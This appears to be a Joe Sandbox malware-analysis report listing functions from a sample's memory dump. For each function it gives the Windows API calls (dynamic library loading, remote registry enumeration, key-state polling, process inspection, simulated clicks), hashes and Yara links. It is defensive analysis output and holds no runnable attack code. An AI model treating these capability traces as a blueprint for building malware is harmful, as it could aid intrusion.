                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1951874230-3916222277
                                                                                                                                  • Opcode ID: 455e35c66461159ad19b8f8c57aaf7acd51ad927ca28a4d1c9f50983c5542604
                                                                                                                                  • Instruction ID: 101d0e29dd1a18b394bf41a5d53c19496261a17823941cee6e60b5991187b596
                                                                                                                                  • Opcode Fuzzy Hash: 455e35c66461159ad19b8f8c57aaf7acd51ad927ca28a4d1c9f50983c5542604
                                                                                                                                  • Instruction Fuzzy Hash: 0C21BEB654060CBFEB22DF64DC84EBBB6ECEB88748F10511AF605E2180EB648D059761
                                                                                                                                  Function 00EA38E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F1454E
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  • _memset.LIBCMT ref: 00EA3965
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EA39B5
                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EA39C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                  • String ID: Line:
                                                                                                                                  • API String ID: 3942752672-1585850449
                                                                                                                                  • Opcode ID: b2477bc9e71c381ffc2df0dfeec64f841d09ac0752d7c84c6c24e460ef168cdb
                                                                                                                                  • Instruction ID: 600e3289e1b9b85a50620eed4873018d5d0b3d5810411c374ec3c0dd871b9324
                                                                                                                                  • Opcode Fuzzy Hash: b2477bc9e71c381ffc2df0dfeec64f841d09ac0752d7c84c6c24e460ef168cdb
                                                                                                                                  • Instruction Fuzzy Hash: 2B31D371408344ABD721EB60CC45FDB77E8BF8A310F04551EF195A61A1DBB0AA88DB92
                                                                                                                                  Function 00F08EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EBC657
                                                                                                                                    • Part of subcall function 00EBC619: GetStockObject.GDI32(00000011), ref: 00EBC66B
                                                                                                                                    • Part of subcall function 00EBC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBC675
                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F08F69
                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00F08F70
                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F08F85
                                                                                                                                  • DestroyWindow.USER32(?), ref: 00F08F8D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                  • Opcode ID: 77cf7b08bb5514b46a2bb307fa3bd130a531fd3b21e26d061c4f784150ad77fb
                                                                                                                                  • Instruction ID: 4e8e88fc402c0c6643fb512f4867d9048159a0af03adaca2eed0b08ff13b7f88
                                                                                                                                  • Opcode Fuzzy Hash: 77cf7b08bb5514b46a2bb307fa3bd130a531fd3b21e26d061c4f784150ad77fb
                                                                                                                                  • Instruction Fuzzy Hash: 66219D7160020AAFEF105E74DC44EBB3BAAEB493B5F105628FA94971D1CB71DC52BB60
                                                                                                                                  Function 00EEE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00EEE392
                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00EEE3E6
                                                                                                                                  • __swprintf.LIBCMT ref: 00EEE3FF
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00F3DBF0), ref: 00EEE43D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                  • String ID: %lu
                                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                                  • Opcode ID: 0c308187f98313247023396968f76e6fc56c3aa90001e661b6f97cd7a1bd0ff2
                                                                                                                                  • Instruction ID: 247408a2e9b7b2c3d6e76e1760afc14d292d255da7228d04d0eecac26ac445c5
                                                                                                                                  • Opcode Fuzzy Hash: 0c308187f98313247023396968f76e6fc56c3aa90001e661b6f97cd7a1bd0ff2
                                                                                                                                  • Instruction Fuzzy Hash: 8A214135A4010CAFCB10EB65CD85DEEB7B8EF49714F104059F915EB291D731EA05DB51
                                                                                                                                  Function 00EDD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                    • Part of subcall function 00EDD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDD640
                                                                                                                                    • Part of subcall function 00EDD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDD653
                                                                                                                                    • Part of subcall function 00EDD623: GetCurrentThreadId.KERNEL32 ref: 00EDD65A
                                                                                                                                    • Part of subcall function 00EDD623: AttachThreadInput.USER32(00000000), ref: 00EDD661
                                                                                                                                  • GetFocus.USER32 ref: 00EDD7FB
                                                                                                                                    • Part of subcall function 00EDD66C: GetParent.USER32(?), ref: 00EDD67A
                                                                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00EDD844
                                                                                                                                  • EnumChildWindows.USER32(?,00EDD8BA), ref: 00EDD86C
                                                                                                                                  • __swprintf.LIBCMT ref: 00EDD886
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                  • String ID: %s%d
                                                                                                                                  • API String ID: 1941087503-1110647743
                                                                                                                                  • Opcode ID: 713572e3e125a1e7ca3dc49af0a02d756f29404946c88ae6fcdca8d2ffbf0581
                                                                                                                                  • Instruction ID: b0fd83c2b2c6db460e632e91c002ee466daf7a48aa6ac60cde70c9bb9fa9a7cc
                                                                                                                                  • Opcode Fuzzy Hash: 713572e3e125a1e7ca3dc49af0a02d756f29404946c88ae6fcdca8d2ffbf0581
                                                                                                                                  • Instruction Fuzzy Hash: DB11D6755042096BDF21BF50CC86FEA3BADEF44704F0090BAFE19BA246CB7499469B70
                                                                                                                                  Function 00F01836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F018E4
                                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F01917
                                                                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F01A3A
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00F01AB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2364364464-0
                                                                                                                                  • Opcode ID: e9ea0509c7523db57633dd2f0cdc8d47c8432b659ab4739148ddc4d820833f36
                                                                                                                                  • Instruction ID: da14dd0a7297150143fa6be9b2472a0918a20b09f732e1035acd685ce274ee5d
                                                                                                                                  • Opcode Fuzzy Hash: e9ea0509c7523db57633dd2f0cdc8d47c8432b659ab4739148ddc4d820833f36
                                                                                                                                  • Instruction Fuzzy Hash: D8819470A50214ABDF209F64C886BAEBBE5BF48720F148059F915BF3C2D7B4E9419B90
                                                                                                                                  Function 00F00579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00F005DF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00F0066E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F0068C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00F006D2
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 00F006EC
                                                                                                                                    • Part of subcall function 00EBF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF282
                                                                                                                                    • Part of subcall function 00EBF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF2A6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 327935632-0
                                                                                                                                  • Opcode ID: f5e956910aacdfdddb92479961da56b5c1dba6757dcfec3a89b2697cc64f8bb4
                                                                                                                                  • Instruction ID: 491bbbb9675ab27d870df9cee3b1cd58989e34ee0d548265f0d55eb22c4236da
                                                                                                                                  • Opcode Fuzzy Hash: f5e956910aacdfdddb92479961da56b5c1dba6757dcfec3a89b2697cc64f8bb4
                                                                                                                                  • Instruction Fuzzy Hash: 04515876A002099FCB00EFA8C891AEDBBF5AF4D310F148065E915AB3A1DB31ED15EB50
                                                                                                                                  Function 00F02D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00F03AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F02DE0
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F02E1F
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F02E66
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00F02E92
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F02E9F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3440857362-0
                                                                                                                                  • Opcode ID: f52e17c0b69b92dd3453c0a028d33e1e87fd663fd451915fc3b7c9eb4c3f7200
                                                                                                                                  • Instruction ID: 76b54f4a4737ab9fb2e54837405ecbbd7ba2728ee047c505fb4ca76d75521be4
                                                                                                                                  • Opcode Fuzzy Hash: f52e17c0b69b92dd3453c0a028d33e1e87fd663fd451915fc3b7c9eb4c3f7200
                                                                                                                                  • Instruction Fuzzy Hash: E7515D72608204AFC744EF64CC85F6AB7E8FF89314F14481EF5969B1A1DB31E905EB62
                                                                                                                                  Function 00F0CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dfeb43a634e136b3f8d6bedc08a415c407bd6201138d092e332a0503678e9689
                                                                                                                                  • Instruction ID: edc5c17472403da82c220da19b1edfaa52e1f9708f3bc5598797cd684da08f3d
                                                                                                                                  • Opcode Fuzzy Hash: dfeb43a634e136b3f8d6bedc08a415c407bd6201138d092e332a0503678e9689
                                                                                                                                  • Instruction Fuzzy Hash: B941DE76D00148ABEB20DB28CC49FA9BBA9FB49320F154355E919A72D1C770AD01FA90
                                                                                                                                  Function 00EF1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EF17D4
                                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EF17FD
                                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EF183C
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EF1861
                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EF1869
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1389676194-0
                                                                                                                                  • Opcode ID: 93f23338c60d14c5790dd6e857b2c2852f4f5039b6c07e1554696556f2013287
                                                                                                                                  • Instruction ID: 6adf5b183d1c18a235e4871ec7aadae4903cb1e4fb4c10fbcb814bce78b49e7f
                                                                                                                                  • Opcode Fuzzy Hash: 93f23338c60d14c5790dd6e857b2c2852f4f5039b6c07e1554696556f2013287
                                                                                                                                  • Instruction Fuzzy Hash: 62412635A00209DFDB11EF64CA81AADBBF5EF0D314B149099E909BB3A1DB31ED01DB61
                                                                                                                                  Function 00EBB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(000000FF), ref: 00EBB749
                                                                                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 00EBB766
                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00EBB78B
                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00EBB799
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                  • Opcode ID: 09ff52c17e6c2b6699f6bdc0033d0532375a09824e5f7106ff7a81fdc3a40609
                                                                                                                                  • Instruction ID: a3b0fdc270e193eb0a103457eb9d586c882943fdb0c2d110536163085536a442
                                                                                                                                  • Opcode Fuzzy Hash: 09ff52c17e6c2b6699f6bdc0033d0532375a09824e5f7106ff7a81fdc3a40609
                                                                                                                                  • Instruction Fuzzy Hash: B7415175904119FFDF259F64C884AEABBB4BB45364F20435AF825A22D0CB70AD90EB91
                                                                                                                                  Function 00EDC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EDC156
                                                                                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00EDC200
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EDC208
                                                                                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00EDC216
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EDC21E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
